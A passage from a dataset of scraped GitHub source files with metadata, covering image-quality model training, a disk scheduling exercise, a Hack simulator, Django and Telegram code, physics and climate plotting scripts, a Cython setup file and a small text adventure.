spread[o])\r\n filter.append(o_list)\r\n return filter\r\n\r\ndef train(data_path):\r\n # This function trains the pristine model\r\n # Parameters\r\n block_size_h = 84\r\n block_size_w = 84\r\n blockrowoverlap = 0\r\n blockcoloverlap = 0\r\n sh_th = 0.78\r\n sigmaForGauDerivative = 1.66\r\n KforLog = 0.00001\r\n normalizedWidth = 524\r\n minWaveLength = 2.4\r\n sigmaOnf = 0.55\r\n mult = 1.31\r\n dThetaOnSigma = 1.10\r\n scaleFactorForLoG = 0.87\r\n scaleFactorForGaussianDer = 0.28\r\n reservedRatio = 0.92\r\n sigmaForDownsample = 0.9\r\n gaussian_window = matlab_fspecial((5,5),5/6)\r\n gaussian_window = gaussian_window/np.sum(gaussian_window)\r\n\r\n trainingFiles = sorted(os.listdir(data_path))\r\n\r\n pic_features = []\r\n pic_sharpness = []\r\n\r\n for img_file in tqdm(trainingFiles):\r\n img = cv2.imread(os.path.join(data_path, img_file))\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n img = img.astype(np.float64)\r\n img = img.round()\r\n # img = cv2.resize(img, (normalizedWidth, normalizedWidth),interpolation=cv2.INTER_AREA)\r\n resize_func = MATLABLikeResize(output_shape=(normalizedWidth, normalizedWidth))\r\n img = resize_func.resize_img(img)\r\n img = np.clip(img, 0.0, 255.0)\r\n\r\n h, w, _ = img.shape\r\n\r\n num_block_h = math.floor(h / block_size_h)\r\n num_block_w = math.floor(w / block_size_w)\r\n img = img[0:num_block_h * block_size_h, 0:num_block_w * block_size_w]\r\n\r\n O1 = 0.3*img[:,:,0] + 0.04*img[:,:,1] - 0.35*img[:,:,2]\r\n O2 = 0.34*img[:,:,0] - 0.6*img[:,:,1] + 0.17*img[:,:,2]\r\n O3 = 0.06*img[:,:,0] + 0.63*img[:,:,1] + 0.27*img[:,:,2]\r\n\r\n RChannel = img[:,:,0]\r\n GChannel = img[:,:,1]\r\n BChannel = img[:,:,2]\r\n\r\n sharpness = []\r\n distparam = [] # dist param is actually the multiscale features\r\n for scale in (1, 2): # perform on two scales (1, 2)\r\n mu = convolve(O3, gaussian_window, mode='nearest')\r\n sigma = np.sqrt(np.abs(convolve(np.square(O3), gaussian_window, mode='nearest') - np.square(mu)))\r\n # normalize, as in Eq. 1 in the paper\r\n structdis = (O3 - mu) / (sigma + 1)\r\n\r\n dx, dy = gauDerivative(sigmaForGauDerivative/(scale**scaleFactorForGaussianDer));\r\n compRes = conv2(O1, dx + 1j*dy, 'same')\r\n IxO1 = np.real(compRes)\r\n IyO1 = np.imag(compRes)\r\n GMO1 = np.sqrt(IxO1**2 + IyO1**2) + np.finfo(O1.dtype).eps\r\n\r\n compRes = conv2(O2, dx + 1j*dy, 'same')\r\n IxO2 = np.real(compRes)\r\n IyO2 = np.imag(compRes)\r\n GMO2 = np.sqrt(IxO2**2 + IyO2**2) + np.finfo(O2.dtype).eps\r\n\r\n compRes = conv2(O3, dx + 1j*dy, 'same')\r\n IxO3 = np.real(compRes)\r\n IyO3 = np.imag(compRes)\r\n GMO3 = np.sqrt(IxO3**2 + IyO3**2) + np.finfo(O3.dtype).eps\r\n\r\n logR = np.log(RChannel + KforLog)\r\n logG = np.log(GChannel + KforLog)\r\n logB = np.log(BChannel + KforLog)\r\n logRMS = logR - np.mean(logR)\r\n logGMS = logG - np.mean(logG)\r\n logBMS = logB - np.mean(logB)\r\n\r\n Intensity = (logRMS + logGMS + logBMS) / np.sqrt(3)\r\n BY = (logRMS + logGMS - 2 * logBMS) / np.sqrt(6)\r\n RG = (logRMS - logGMS) / np.sqrt(2)\r\n\r\n compositeMat = [structdis, GMO1, GMO2, GMO3, Intensity, BY, RG, IxO1, IyO1, IxO2, IyO2, IxO3, IyO3]\r\n\r\n h, w = O3.shape\r\n\r\n LGFilters = logGabors(h,w,minWaveLength/(scale**scaleFactorForLoG),sigmaOnf,mult,dThetaOnSigma)\r\n fftIm = np.fft.fft2(O3)\r\n\r\n logResponse = []\r\n partialDer = []\r\n GM = []\r\n for scaleIndex in range(3):\r\n for oriIndex in range(4):\r\n response = np.fft.ifft2(LGFilters[scaleIndex][oriIndex]*fftIm)\r\n realRes = np.real(response)\r\n imagRes = np.imag(response)\r\n\r\n compRes = conv2(realRes, dx + 1j*dy, 'same')\r\n partialXReal = np.real(compRes)\r\n partialYReal = np.imag(compRes)\r\n realGM = np.sqrt(partialXReal**2 + partialYReal**2) + np.finfo(partialXReal.dtype).eps\r\n compRes = conv2(imagRes, dx + 1j*dy, 'same')\r\n partialXImag = np.real(compRes)\r\n partialYImag = np.imag(compRes)\r\n imagGM = np.sqrt(partialXImag**2 + partialYImag**2) + np.finfo(partialXImag.dtype).eps\r\n\r\n logResponse.append(realRes)\r\n logResponse.append(imagRes)\r\n partialDer.append(partialXReal)\r\n partialDer.append(partialYReal)\r\n partialDer.append(partialXImag)\r\n partialDer.append(partialYImag)\r\n GM.append(realGM)\r\n GM.append(imagGM)\r\n\r\n compositeMat.extend(logResponse)\r\n compositeMat.extend(partialDer)\r\n compositeMat.extend(GM)\r\n\r\n feat = []\r\n for idx_w in range(num_block_w):\r\n for idx_h in range(num_block_h):\r\n # process each block\r\n block_posi = [idx_h * block_size_h // scale, (idx_h + 1) * block_size_h // scale,\r\n idx_w * block_size_w // scale, (idx_w + 1) * block_size_w // scale]\r\n feat.append(compute_feature(compositeMat, block_posi))\r\n\r\n if scale == 1:\r\n for idx_w in range(num_block_w):\r\n for idx_h in range(num_block_h):\r\n # process each block\r\n block_posi = [idx_h * block_size_h // scale, (idx_h + 1) * block_size_h // scale,\r\n idx_w * block_size_w // scale, (idx_w + 1) * block_size_w // scale]\r\n sharpness.append(compute_mean(sigma, block_posi))\r\n\r\n distparam.append(np.array(feat))\r\n gauForDS = matlab_fspecial([math.ceil(6*sigmaForDownsample), math.ceil(6*sigmaForDownsample)], sigmaForDownsample)\r\n filterResult = convolve(O1, gauForDS, mode='nearest')\r\n O1 = filterResult[0::2,0::2]\r\n filterResult = convolve(O2, gauForDS, mode='nearest')\r\n O2 = filterResult[0::2,0::2]\r\n filterResult = convolve(O3, gauForDS, mode='nearest')\r\n O3 = filterResult[0::2,0::2]\r\n\r\n filterResult = convolve(RChannel, gauForDS, mode='nearest')\r\n RChannel = filterResult[0::2,0::2]\r\n filterResult = convolve(GChannel, gauForDS, mode='nearest')\r\n GChannel = filterResult[0::2,0::2]\r\n filterResult = convolve(BChannel, gauForDS, mode='nearest')\r\n BChannel = filterResult[0::2,0::2]\r\n\r\n distparam = np.concatenate(distparam, axis=1)\r\n pic_features.append(np.array(distparam))\r\n pic_sharpness.append(sharpness)\r\n\r\n prisparam = None\r\n for i in range(len(pic_features)):\r\n cur_distparam = pic_features[i]\r\n cur_sharpness = pic_sharpness[i]\r\n InfIndicator = np.sum(np.isinf(cur_distparam),axis=1)\r\n InfIndicator = np.where(InfIndicator>0, 1, 0)\r\n cur_sharpness = np.array(cur_sharpness)*(1-InfIndicator)\r\n feat = cur_distparam[np.where(cur_sharpness>sh_th*np.max(cur_sharpness))]\r\n if prisparam is None:\r\n prisparam = np.array(feat)\r\n else:\r\n prisparam = np.concatenate((prisparam, feat), axis=0)\r\n\r\n dataInHighDim = prisparam.T\r\n principleVectors, meanOfSampleData, projectionOfTrainingData = MyPCA(dataInHighDim,reservedRatio)\r\n\r\n prisparam = projectionOfTrainingData.T\r\n mu_prisparam = np.nanmean(prisparam, axis=0)\r\n prisparam_no_nan = prisparam[~np.isnan(prisparam).any(axis=1)]\r\n cov_prisparam = np.cov(prisparam_no_nan, rowvar=False)\r\n\r\n templateModel = []\r\n templateModel.append(mu_prisparam)\r\n templateModel.append(cov_prisparam)\r\n templateModel.append(meanOfSampleData)\r\n templateModel.append(principleVectors)\r\n\r\n scipy.io.savemat('./python_templateModel.mat', {'templateModel':[templateModel]})\r\n\r\nif __name__ == '__main__':\r\n import warnings\r\n img_path = '../pristine/'\r\n with warnings.catch_warnings():\r\n warnings.simplefilter('ignore', category=RuntimeWarning)\r\n time_start = time.time()\r\n\r\n train(img_path)\r\n\r\n time_used = time.time() - time_start\r\n print(f'\\t time used in sec: {time_used:.4f}')\r\n","repo_name":"IceClear/IL-NIQE","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":16214,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"69"}
+{"seq_id":"71757462940","text":"# 바로 이전에 작업을 완료한 시간(start)보다 크고 현재 시점(now)보다 작으면 현재 시점에서 처리할 수 있는 작업이 된다.\n# 현재 시점에서 처리할 수 있는 작업을 heap에 저장한다. \n# 이 때 소요시간을 기준으로 최소힙을 사용하기 때문에 heap을 저장할 때 [작업 소요 시간, 작업 요청 시간]으로 저장한다. \n# heap의 길이가 0보다 크다면 처리할 작업이 있는 경우이므로, 작업 요청시간부터 종료시간까지 계산하고 다음 작업으로 넘어갈 수 있도록 start와 now값을 바꿔준다. \n# heap의 길이가 0이라면 처리할 작업이 없는 경우 이므로 현재 시점을 다음 시간으로 넘어가기 위해 now에 1을 더한다. \n# 마지막으로 평균시간을 return한다. \n\n# 현재 시점에서 처리할 수 있는 작업들을 힙에 넣고, 하나를 뽑아 현재 시점과 총 대기시간을 구해주는 것을 모든 작업을 처리할 때까지 반복. \n# 힙에 push를 할 때에는 작업의 소요시간 기준으로 최소힙이 만들어져야하므로 jobs 요소의 위치를 바꿔서 넣어준다.\n# 현재 시점에서 처리할 수 있는 작업인지 판별하는 조건 : 작업의 요청시간이 바로 이전에 완료한 작업 시작 시간(start)보다 크고 현재 시점(now)보다 작아야함.\n# 만약 현재 처리할 수 있는 작업이 없다면, 남아있는 작업들의 요청시간이 아직 오지 않은 것이기 때문에 현재 시점(now)를 하나 올려준다. \nimport heapq\n\ndef solution(jobs):\n answer,now,cnt = 0,0,0 \n start = -1\n heap = []\n\n while cnt < len(jobs):\n # 현재 시점에서 처리할 수 있는 작업을 heap에 저장\n for j in jobs:\n if start < j[0] <= now:\n heapq.heappush(heap,[j[1], j[0]])\n\n # 처리할 작업이 있는 경우\n if len(heap) > 0:\n cnt += 1\n current = heapq.heappop(heap)\n start = now\n now += current[0]\n answer += (now - current[1]) # 작업 요청시간부터 종료시간까지의 시간계산\n else: # 처리할 작업 X\n now += 1 \n return int(answer/len(jobs))\n\njobs = [[0,3], [1,9], [2,6]]\nprint(solution(jobs))\n \n ","repo_name":"dhflxhdxhd/for-coding-test","sub_path":"Programmers/heap/disk.py","file_name":"disk.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15045174529","text":"from __future__ import annotations\n\nimport os\nfrom dataclasses import dataclass\nfrom pathlib import Path\n\nfrom n2t import definitions\nfrom n2t.core.hack_simulator import HackSimulator\n\n\n@dataclass\nclass Simulator:\n cycles: int\n file_name: str\n file_path: Path\n path_to_dir: str\n\n @classmethod\n def load_from(cls, file_name: str, cycles: int) -> Simulator:\n if not os.path.isabs(file_name):\n file_name = os.path.join(\n os.path.dirname(definitions.N2T_DIRECTORY),\n file_name,\n )\n file_path: Path = Path(file_name)\n file_name = file_path.stem\n path_to_dir = os.path.dirname(file_path)\n\n return cls(cycles, file_name, file_path, path_to_dir)\n\n def translate(self) -> None:\n to_simulate: list[str] = []\n\n with self.file_path.open(\"r\", newline=\"\") as file:\n for line in file:\n to_simulate.append(line)\n\n ram_output: list[str] = HackSimulator.simulate(to_simulate, self.cycles)\n\n new_path: Path = Path(os.path.join(self.path_to_dir, self.file_name + \".out\"))\n\n with new_path.open(\"w\", newline=\"\") as file:\n for current_ram in ram_output:\n file.write(f\"{current_ram}\\n\")\n","repo_name":"ZukaChilachava/HackSimulator","sub_path":"n2t/infra/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14000943434","text":"import telegram\nfrom django.conf import settings\nfrom rest_framework.serializers import ModelSerializer, ValidationError\n\nfrom telegram_messages import models as m\nfrom users.models import User\n\nbot = telegram.Bot(token=settings.TELEGRAM_BOT_TOKEN)\n\n\nclass MessageSerializer(ModelSerializer):\n class Meta:\n model = m.Message\n fields = (\n \"text\",\n \"date_created\",\n )\n\n def create(self, validated_data):\n text: str = validated_data[\"text\"]\n user: User = validated_data[\"user\"]\n\n if user.telegram_chat_id:\n bot.send_message(\n chat_id=user.telegram_chat_id,\n text=f\"{user.name}, я получил от тебя сообщение:\\n{text}\",\n )\n\n else:\n raise ValidationError(\n {\"non_fields_error\": \"User does not have connected telegram chat\"}\n )\n\n return super().create(validated_data)\n","repo_name":"renegatemaster/factory_bot","sub_path":"factory_bot/telegram_messages/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"33080591520","text":"import csv\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport ROOT as rt\n\ndef mean(x, y):\n return x.dot(y)/y.sum()\n\ndef std(x, y):\n mu = mean(x, y)\n var = np.power(x, 2).dot(y)/y.sum() - mu * mu\n return np.sqrt(var)\n\nx = []\ny = []\nx_err = []\ny_err = []\n\nwith open('Mathematica.csv') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n for row in spamreader:\n# print ', '.join(row)\n x.append(float(row[0]))\n x_err.append(0)\n y.append(float(row[1]))\n y_err.append( 10. )\n\n #print x,y\n width = x[1]-x[0]\n x = np.asarray(x)\n y = np.asarray(y)\n x_err = np.asarray(x_err)\n y_err = np.asarray(y_err)\n gr = rt.TGraphErrors(len(x), x, y, x_err, y_err)\n c = rt.TCanvas(\"c\", \"c\", 800, 600)\n f1 = rt.TF1(\"f1\", \"[0]+[1]*cos([2]*x+[3])\", 0, 4000)\n f1.SetParameter(0, 450.)\n f1.SetParameter(1, 400.)\n f1.SetParameter(2, 1./3000.)\n f1.SetParameter(3, 600./3000.)\n gr.Fit(\"f1\",\"REM\")\n gr.SetMarkerStyle(20)\n gr.SetMarkerColor(rt.kBlue)\n gr.SetMarkerSize(0.1)\n gr.SetLineColor(rt.kBlue)\n gr.Draw(\"AP\")\n gr.SetTitle(\"\")\n gr.GetXaxis().SetTitle(\"IM bias (adc count)\")\n gr.GetYaxis().SetTitle(\"PM output (adc count)\")\n f1.Draw(\"same\")\n\n textCMS = rt.TLatex(0.1,0.95,\"FQNET\")\n textCMS.SetNDC()\n textCMS.SetTextAlign(13)\n textCMS.SetTextFont(62)\n textCMS.SetTextSize(0.05)\n textCMS.Draw()\n\n label = \"f(x) = \"+ str(\"%.2f\"%f1.GetParameter(0)) + \" + \" + str(\"%.2f\"%f1.GetParameter(1)) + \"*Cos(\"+str(\"%.4f\"%f1.GetParameter(2))+\"*x + \"+ str(\"%.2f\"%f1.GetParameter(3)) +\")\"\n textF1 = rt.TLatex(0.4,0.8, label)\n textF1.SetNDC()\n textF1.SetTextAlign(13)\n textF1.SetTextFont(62)\n textF1.SetTextSize(0.03)\n textF1.Draw()\n\n c.SaveAs(\"tgrap.pdf\")\n\n #fig, ax = plt.subplots(figsize=(8, 6))\n #plt.bar(x,y,width)\n #plt.xlabel('time [ps]')\n #plt.ylabel('entries')\n #plt.text(0.15, 0.7, 'mu: {:.3f}'.format(mean(x, y)),\n # transform=ax.transAxes)\n #plt.text(0.15, 0.65, 'std: {:.3f}'.format(std(x, y)),\n # transform=ax.transAxes)\n #plt.savefig('dustin.png')\n #print x.dot(y)/y.sum()\n #print np.sqrt(np.power(x,2).dot(y)/y.sum() - np.power( x.dot(y)/y.sum(), 2) )\n #rint mean(x, y)\n #print std(x, y)\n\n # test on random data\n #rand_data = np.random.normal(580, 16, size=100000)\n #counts, edges = np.histogram(rand_data, bins=100)\n #centers = (edges[1:] + edges[:-1])/2.0\n #print(\"Mean and std of simulated data histogram: {:.3f}, {:.3f}\".format(\n # mean(centers, counts), std(centers, counts)))\n\n #reader = csv.DictReader(csvfile)\n #for row in reader:\n # print row\n","repo_name":"CaltechPrecisionTiming/KeysightScope","sub_path":"python/plotTGraphAndFitCos.py","file_name":"plotTGraphAndFitCos.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"7746314089","text":"#################################################################################\r\n# Milos Atz\r\n# NE155 Homework 6\r\n#################################################################################\r\nimport math\r\nimport numpy as np\r\nimport scipy.linalg\r\nimport math\r\n#####################################################################################################\r\n# Problem 4\r\n# Numerically solve the eigenvalue form of the diffusion equation with the same BCs as in Problem 2. Use FDM for the discretization of the spatial variable; use Power Iteration to find the dominant eigenvalue and corresponding eigenvector. Note that you may need to normalize the solution vector (should at least normalize the initial guess). Use SOR or GS method to complete the solve portion of the algorithm. Use absolute error tolerance to check for convergence.\r\n#####################################################################################################\r\n# Define the GS solver used in the problem script; this is the same as what was used in HW5.\r\ndef gs_solver(A, b, tol=1e-6):\r\n\tif(min(np.linalg.eigvals(A)<0)):\r\n\t\tsys.exit('A is not positive definite')\r\n\tif((A.transpose() != A).all()):\r\n\t\tsys.exit('A is not symmetric')\r\n\tif(b.size!=A.shape[0] or b.size!=A.shape[1]):\r\n\t\tsys.exit('dimensions of A and b do not agree')\r\n\tn=b.size\r\n\tx_old=np.transpose(np.matrix(np.zeros(n)))\r\n\tD=np.diag(np.diag(A))\r\n\tL=np.diag(np.diag(A,-1),-1)\r\n\tU=np.diag(np.diag(A,1),1)\r\n\tDL_inv=np.linalg.inv(D+L)\r\n\tconv=1\r\n\tcounter=0\r\n\twhile(conv>tol):\r\n\t\tx_new=DL_inv*(-U*x_old+b)\r\n\t\t# print(x_new)\r\n\t\tconv=np.linalg.norm(x_new-x_old)\r\n\t\tx_old=x_new\r\n\t\tcounter=counter+1\r\n\t# print('counter= '+str(counter))\r\n\t# print('absolute error = '+str(conv))\r\n\treturn(x_new)\r\n#####################################################################################################\r\na = 4.0\t\t\t# cm\r\nD = 1.0\t\t\t# cm\r\nsig_a = 0.7\t\t# 1/cm\r\nvsig_f = 0.6\t#1/cm\r\nh = 0.1\t\t\t# cm\r\n#####################################################################################################\r\n# First, we determine the number of cells and points.\r\nn_cell = int((a-(-1*a))/h)\r\nn_points = n_cell+1\r\n#####################################################################################################\r\n# We need initial values for k(0) and phi(0) for i=0,...,n-1; we normalize phi0 = phi0/norm(phi0). Let's assume that k(0)=1 and phi(0)=1 for i=0,...,n-1.\r\nk = 0.98\r\nphi = np.transpose(np.matrix(np.ones(n_cell-1)))\r\nphi = phi/np.linalg.norm(phi)\r\n#####################################################################################################\r\n# We compute A in the same way as done for Problem 2. A is made up out of the coefficients for flux; A is a tridiagonal matrix. The inputs a, b, and c allow for the input of those coefficients.\r\nA_a = [-1]*int(n_cell-2)\r\nA_b = [2+(sig_a*h**2/D)]*int(n_cell-1)\r\nA_c = [-1]*int(n_cell-2)\r\nA = np.matrix(np.diag(A_a, -1)+np.diag(A_b, 0)+np.diag(A_c, 1))\r\n#####################################################################################################\r\n# The initial fission source is calculated as nu*sig_F_i,i*phi(0)_i. nu*sig_F is constant, so we just multiply that by the initial guess for phi.\r\nQ = (h**2*vsig_f/D)*phi\r\n#####################################################################################################\r\n# In order to iterate until convergence, we set up a convergence criterion, defined by the error of the solution relative to our desired tolerance. We have two criteria to set up - one for the eigenvector (phi) and one for the eigenvalue (k). The absolute error will be calculated as k(n)-k(n-1) and ||Ax-b|| for phi.\r\nerror_k = 1\r\nerror_phi = 1\r\ntol = 1e-4\r\ncounter = 0\r\n#####################################################################################################\r\n# Within the while loop, we will iterate to solve A*phi = (1/k)*Q using the GS method, which has it's own iteration loop.\r\nwhile(error_k > tol or error_phi > tol):\r\n\tcounter = counter+1\r\n\tb = (1/k)*Q\r\n\t# Use the GS solver to solve for phi(m)\r\n\tphi_new = gs_solver(A,b)\r\n\t# Compute the next fission source\r\n\tQ_new = (h**2*vsig_f/D)*phi_new\r\n\t# Compute the next eigenvalue\r\n\tk_new = k*sum(Q_new)/sum(Q)\r\n\t# Check for convergence\r\n\terror_k = abs(k_new-k)\r\n\terror_phi = np.linalg.norm(phi_new-phi)\r\n\tk=float(k_new)\r\n\t# print(k)\r\n\tphi=phi_new\r\n\tQ=Q_new\r\nprint('k = '+str(k))\r\nprint('number of power iterations = '+str(counter))\r\nprint('error in phi = '+str(float(error_phi)))\r\nprint('error in k = '+str(float(error_k)))\r\nphi=np.transpose(np.insert(phi, 0, 0.0))\r\nphi=np.transpose(np.insert(phi, n_points-1, 0.0))\r\n#####################################################################################################\r\n# Plot the eigenvector, phi, from x = -a to a, Report the eigenvalue, k, and the number of power iterations required for convergence.\r\nimport matplotlib.pyplot as plt\r\nx_vals=[0]*n_points\r\nfor i in range(0,n_points):\r\n\tx_vals[i]=-1*a+h*i\r\nx_vals=np.transpose(np.matrix(x_vals))\r\nfig=plt.plot(x_vals, phi, 'rx', label='finite difference')\r\nplt.xlim([-a-0.5,a+0.5])\r\nplt.ylabel('phi(x)')\r\nplt.xlabel('x')\r\nplt.figtext(0.14, 0.86, 'k = '+str(round(k,5)))\r\nplt.figtext(0.14, 0.82, 'power iterations = '+str(counter))\r\nplt.figtext(0.14, 0.78, 'error in phi = '+str(round(float(error_phi),9)))\r\nplt.figtext(0.14, 0.74, 'error in k = '+str(round(float(error_k),9)))\r\n#plt.show()\r\nplt.savefig('p4_flux.png', bbox_inches='tight')\r\nplt.clf()\r\n\r\n\r\n","repo_name":"MilosAtz/NE155","sub_path":"HW6/P4.py","file_name":"P4.py","file_ext":"py","file_size_in_byte":5445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"8333541022","text":"# Mohammad Mishal S. Noroña | BSCPE 1-5 | Assignment #7\n# Creata a Class for USer's Input\nclass UserInput:\n # Number Input Function\n def num_input(self):\n while True:\n try:\n num = float(input(\"Enter a number:\"))\n return num\n except ValueError:\n print(\"\\nInvalid Input\")\n print(\"Enter a Numerical Value\\n\")\n continue\n # Operation Input Function\n def operation_input(self):\n print(\"\\nList Of Operation \\n\")\n print(\"[a] Add\")\n print(\"[s] Subtract\")\n print(\"[m] Multiply\")\n print(\"[d] Divide\")\n print(\"[p] Percent\")\n print(\"[e] Exponent\")\n\n operation = input(\"\\nEnter an Operation [a/s/m/d/p/e]: \")\n return operation\n # Ask user for another input\n def try_again(self):\n more_input = input(\"\\nDo you want to Enter another? (y/n): \")\n return more_input","repo_name":"KaninWithRice/Class-Calculator","sub_path":"Class_User_Input.py","file_name":"Class_User_Input.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14012007405","text":"from django.contrib import admin\nfrom . import models\n# admin.site.register(models.Profil)\n\n\n@admin.register(models.Profil)\nclass ProfilAdmin(admin.ModelAdmin):\n list_display = (\"id\", \"name\")\n search_fields = ('name',)\n list_filter = ('created_at', 'update_at')\n\n\n@admin.register(models.SocialLink)\nclass SocialLinkAdmin(admin.ModelAdmin):\n list_display = ('id', 'name')\n search_fields = ('name', \"url\")\n list_filter = ('created_at', 'update_at')\n\n\n@admin.register(models.Post)\nclass PostAdmin(admin.ModelAdmin):\n list_display = (\"title\",)\n search_fields = (\"title\",)\n list_filter = ('created_at', 'update_at')\n\n\n@admin.register(models.About)\nclass AboutAdmin(admin.ModelAdmin):\n list_filter = ('created_at', 'update_at')\n\n","repo_name":"diamond1516/My_Blog_Web","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29233896833","text":"import datetime as dt # Python standard library datetime module\nimport numpy as np\nfrom pyhdf import SD\nfrom mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\n\nf = SD.SD('Data/modis_test.hdf')\n#view datasets\ndatasets_dic = f.datasets()\n\n\nlat=f.select('Latitude')\nlon=f.select('Longitude')\nlon=lon.get()\nlat=lat.get()\n\n\nsds_obj = f.select('Cloud_Fraction_Nadir_Day') # select sds\n\ndata = sds_obj.get()*0.01 # get sds data\n\n#for key, value in sds_obj.attributes().items():\n # print (key, value)\n # if key == 'add_offset':\n # add_offset = value \n # if key == 'scale_factor':\n # scale_factor = value\n\n#data = (data - add_offset) * scale_factor\n\n\n\n#print (data)\n \n#data_av = np.mean(data, axis=0) \nplt.figure()\nplt.contourf(lon, lat, data)\n\nlat_bins=np.arange(-25,-5,0.5)\nlat_hist=np.digitize(lat,bins=lat_bins)\nlist1=[]\nfor i in range(len(lat_bins)):\n location=lat_hist==i\n cf_lat=data[location]\n nw_data=np.nanmean(cf_lat[(cf_lat<1.0)&(cf_lat>-0.01)])\n list1.append(nw_data)\nplt.figure()\nplt.plot(lat_bins,list1)\nplt.xlabel('Latitude')\nplt.ylabel('Total Cloud Fraction')\nplt.title('Total Cloud Fraction vs Latitude')\nplt.grid(True)\n\n\n#plt.contourf(lon,lat,data_av)\n\n\n","repo_name":"tristanohanlon/climate-analysis","sub_path":"old_scripts/script_for_opening_modis_dev.py","file_name":"script_for_opening_modis_dev.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"26753119651","text":"import re\r\nf = open('School/Maturita/texty/13.txt','r').read()\r\narr = []\r\nfil = re.findall(r'[A-Za-z]+',f)\r\nfor word in fil:\r\n w = (word.lower())\r\n arr.append(w)\r\n\r\nstring = ''\r\n\r\nfor i in arr:\r\n string +=i\r\nprint(string)\r\nrere = re.findall(r'[a-z]',string)\r\nhelpiarr = []\r\ncnt = 0\r\nhelpi = []\r\nabeceda= ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\r\nfor iksde in range(len(abeceda)):\r\n j = abeceda[iksde]\r\n sree = (j+':'+str(rere.count(j)))\r\n helpi.append(sree)\r\nprint(helpi)\r\n \r\n\r\n\r\n\r\n\r\n","repo_name":"DestroTheCreator/Maturita","sub_path":"Maturita/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"71347819741","text":"from setuptools import setup, Extension\nfrom codecs import open\n\ntry:\n from Cython.Distutils import build_ext\nexcept ImportError:\n use_cython = False\nelse:\n use_cython = True\n\nif use_cython:\n sourcefiles = ['pycspade/cspade.pyx']\nelse:\n sourcefiles = ['pycspade/cspade.cpp']\n\nother_files = ['csrc/{}'.format(x) for x in [\n 'Itemset.cc', 'Array.cc', 'ArrayT.cc', 'Eqclass.cc', 'Lists.cc', 'extl2.cc', 'partition.cc', 'maxgap.cc',\n 'calcdb.cc', 'makebin.cc', 'getconf.cc', 'exttpose.cc', 'utils.cc'\n]]\n\nsourcefiles += other_files\n\next_modules = [\n Extension('pycspade.cspade',\n sourcefiles,\n include_dirs=['csrc/'],\n language='c++',\n extra_compile_args=[\n '-std=c++11',\n '-Wno-sign-compare',\n '-Wno-incompatible-pointer-types',\n '-Wno-unused-variable',\n '-Wno-absolute-value',\n '-Wno-visibility',\n '-Wno-#warnings']\n )\n]\n\nsetup(\n name='pycspade',\n cmdclass={'build_ext': build_ext},\n ext_modules=ext_modules,\n license='MIT',\n packages=['pycspade'],\n version='0.3.2',\n author=['Mohammed J. Zaki', 'Yukio Fukuzawa'],\n description='C-SPADE Python Implementation',\n long_description=open('README.md').read(),\n url='https://github.com/fzyukio/pycspade',\n keywords=['cspade', 'c-spade', 'sequence mining'],\n install_requires=['Cython'],\n\n)\n","repo_name":"fzyukio/pycspade","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"33627339326","text":"import os\n\nos.system('clear')\n\nprint(\"You enter a dark room with two doors...Do you go through Door #1 or Door #2?\")\n\ndoor = input(\"> \")\n\nif door == \"1\":\n print(\"\"\"There is a giant bear here eating cheesecake. What do you do?\n1.) Take the cheesecake.\n2.) Scream at the bear.\"\"\")\n door1 = input(\"> \")\n\n if door1 == \"1\":\n print(\"The bear rips your intestines out and you die.\")\n elif door1 == \"2\":\n print(\"The bear screams back and you die.\")\n else:\n print(f\"You die because {door1} was dumb.\")\n\nelif door == \"2\":\n print(\"\"\"There is a deep sea of nothingness. What do you do?\n1.) Fire a magic missle into the void.\n2.) Jump into the black abyss and hope for the best.\"\"\")\n door2 = input(\"> \")\n\n if door2 == \"1\":\n print(\"The missle hits you and you die.\")\n elif door2 == \"2\":\n print(\"You fall int a hole and you die.\")\n else:\n print(f\"You die because {door2} was dumb.\")\n\nelse:\n print(f\"You die because {door} was not an option.\")\n\nprint(\"\\n\")","repo_name":"bmbell23/websites","sub_path":"html/Coding/Python/Courses/Learn_Python_the_Hard_Way/ex31.py","file_name":"ex31.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
